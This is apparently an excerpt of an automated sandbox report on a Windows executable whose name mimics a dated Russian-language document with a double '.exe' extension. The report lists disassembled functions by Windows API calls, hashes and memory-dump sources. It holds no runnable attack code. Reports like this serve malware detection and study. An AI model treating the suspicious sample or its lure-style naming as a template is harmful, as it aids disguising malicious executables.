                                                            • Instruction Fuzzy Hash: C0E08672301100ABE750CFA4DE49AAA77ACDF80378F20417FF615E60D1E6B89A41D72D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
                                                            • Instruction ID: ed87ac6fe78c97b3ff6a715646c68139f6b7da630c9be1cec1260a384e7beadd
                                                            • Opcode Fuzzy Hash: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
                                                            • Instruction Fuzzy Hash: 3AE0E676154108BFDB01DFA5EE47FE977ECAB44704F048035BA08D7091C674F5508768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                            • Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
                                                            • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                            • Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                            • Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
                                                            • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                            • Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402310
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString
                                                            • String ID:
                                                            • API String ID: 1096422788-0
                                                            • Opcode ID: 2412c5e6e38f405480bfb5068b9d3e64da5a88d06b16ee9e0a03aeafae2b93d0
                                                            • Instruction ID: 815fd251d1ef055c124add3867079dbd89389a2e6f50d5753089410e689aa70c
                                                            • Opcode Fuzzy Hash: 2412c5e6e38f405480bfb5068b9d3e64da5a88d06b16ee9e0a03aeafae2b93d0
                                                            • Instruction Fuzzy Hash: 91E04F30800208BBDF01AFA4CE49DBD3B79AF00344F14043AF940AB0D5E7F89A819749
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 6ef0c3512c2906a1c08331c62920983107679ca7315389df55633a20f56d33da
                                                            • Instruction ID: 76e81b74098be2a3706baaa1e1a2527734eadd1478321fb398c06c814fc07831
                                                            • Opcode Fuzzy Hash: 6ef0c3512c2906a1c08331c62920983107679ca7315389df55633a20f56d33da
                                                            • Instruction Fuzzy Hash: B5D05E33B05100DBDB10DFE8AE08ADD77B5AB80338B24817BE601F21E4D6B8C6509B1D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(000103E6,00000000,00000000,00000000), ref: 00404172
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                            • Instruction ID: c65f6eba747e04129790f2b1b21bae9375029ebd28d99582ecd6e8b4464eea9f
                                                            • Opcode Fuzzy Hash: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                            • Instruction Fuzzy Hash: 56C09B717447007BDA119F609D4DF1777646764702F1544797344F51D0C774D450D61C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                            • Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
                                                            • Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                            • Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00403266
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                            • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                            • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                            • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,00403F0E), ref: 00404140
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                            • Instruction ID: 67e4992f565e21c11dbb8c54ac12ec2a13ba7de1e04ee321f93102ddb6e8c06b
                                                            • Opcode Fuzzy Hash: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                            • Instruction Fuzzy Hash: B2A00176944501EBCE129B90EF49D0ABB62EBE4701B5185B9A685900348A728862EB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: f5155c82eacd931717c49448e5e104d46a4312587cf016571ad76e57a440d271
                                                            • Instruction ID: d12e9c11b6b9b854787454326f23abfe3faf9d6a634dc5341367369e5c825980
                                                            • Opcode Fuzzy Hash: f5155c82eacd931717c49448e5e104d46a4312587cf016571ad76e57a440d271
                                                            • Instruction Fuzzy Hash: B0D01277B141009BE750EFB9BF89CAF73A8EB913293254837D902E10E2D57CD801862C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B43
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404B4E
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
                                                            • LoadBitmapW.USER32(0000006E), ref: 00404BAB
                                                            • SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
                                                            • DeleteObject.GDI32(00000000), ref: 00404C21
                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
                                                            • ShowWindow.USER32(?,00000005), ref: 00404D7B
                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F4B
                                                            • GlobalFree.KERNEL32(?), ref: 00404F5B
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
                                                            • ShowWindow.USER32(?,00000000), ref: 004050FA
                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                            • ShowWindow.USER32(00000000), ref: 0040510C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 1638840714-813528018
                                                            • Opcode ID: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                            • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                            • Opcode Fuzzy Hash: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                            • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 004045FE
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404628
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004046D9
                                                            • CoTaskMemFree.OLE32(00000000), ref: 004046E4
                                                            • lstrcmpiW.KERNEL32(Remove folder: ,0042D248,00000000,?,?), ref: 00404716
                                                            • lstrcatW.KERNEL32(?,Remove folder: ), ref: 00404722
                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
                                                              • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
